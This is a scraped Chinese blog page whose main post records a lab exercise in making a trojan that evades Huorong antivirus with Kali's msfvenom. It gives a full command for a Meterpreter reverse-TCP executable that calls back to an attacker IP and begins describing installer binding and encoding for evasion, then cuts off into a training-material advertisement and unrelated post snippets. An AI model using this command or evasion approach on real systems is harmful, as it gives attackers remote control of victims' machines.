news 2026/4/17 21:03:56

【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)

目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。

工具准备:火绒安全-3.0.42.0

【点击免费下载工具】

**实验环境:**kali-2019.4 (攻击方,IP:192.168.255.130)、win10(靶机)

【知识补充】

关于Msfvenom:

(msfvenom ----a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.)

是用来生成后门的软件,在目标机上执行,在本地机上监听上线。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

关于免杀:其实就是使制作的木马免于杀毒软件查杀的意思。技术实现方面由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避杀毒软件的查杀。

1.使用kali自带工具Msfvenom制作 木马

这里使用6种不同方法进行木马制作

方式1)直接生成裸露的木马

在kali虚拟机上终端输入命令直接生成一个裸漏的木马:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.255.130 lport=4444 -f exe -o /root/Desktop/csdn.exe

上面参数意思:

-a–arch < architecture>指定payload的目标架构,例如x86 还是 x64 还是 x86_64
-p–payload < payload>指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
lhost指定shell返回的地址
lport指定shell返回的端口
-f–format < format> 指定输出格式
-o–out < path> 指定创建好的payload的存放位置

补充:Msfvenom介绍及利用 内含参数介绍

能看到桌面上生成了一个 csdn.exe 的可执行程序

方式2)生成木马捆绑在正常的安装包上并进行MSF编码使其具备免杀能力

在 Meatsploit 框架下免杀的方式之一就是使用MSF编码器。其功能是对攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。MSF 编码器可以将原可执行程序重新编码,生成一个新的二进制文件,这个文件运行以后,MSF 编码器会将原始程序解码到内存中并执行。

在1)的基础上增加了两个参数,一个是捆绑一个是进行M

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。

1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 3:51:32

vue和springboot框架开发的社区技术论坛交流平台_hnqvkp45

文章目录具体实现截图主要技术与实现手段关于我本系统开发思路java类核心代码部分展示结论源码lw获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;具体实现截图 同行可拿货,招校园代理 vuespringboot_hnqvkp45 框架开发的社区技术论坛交流…

作者头像 李华
网站建设 2026/4/17 23:59:24

Linux密码管理深度解析:passwd与chpasswd的底层机制对比

摘要 本文从Linux安全专家视角&#xff0c;深入剖析passwd与chpasswd命令在密码设置中的底层原理差异&#xff0c;涵盖PAM模块调用机制、密码存储格式、安全考量及实际操作实例&#xff0c;为系统管理员提供全面的技术参考。 1. 核心概览&#xff1a;两种密码管理工具的本质区…

作者头像 李华
网站建设 2026/4/18 8:17:01

Vulkan教程(二十一):顶点输入描述:Vulkan 顶点缓冲的数据格式定义

目录 一、修改顶点着色器:接收外部顶点数据 二、定义 CPU 端顶点数据结构 2.1 引入依赖与定义结构体 2.2 定义顶点数据数组 三、顶点绑定描述(Binding Description) 核心参数解析 四、顶点属性描述(Attribute Description) 4.1 核心参数解析 五、配置图形管线的顶…

作者头像 李华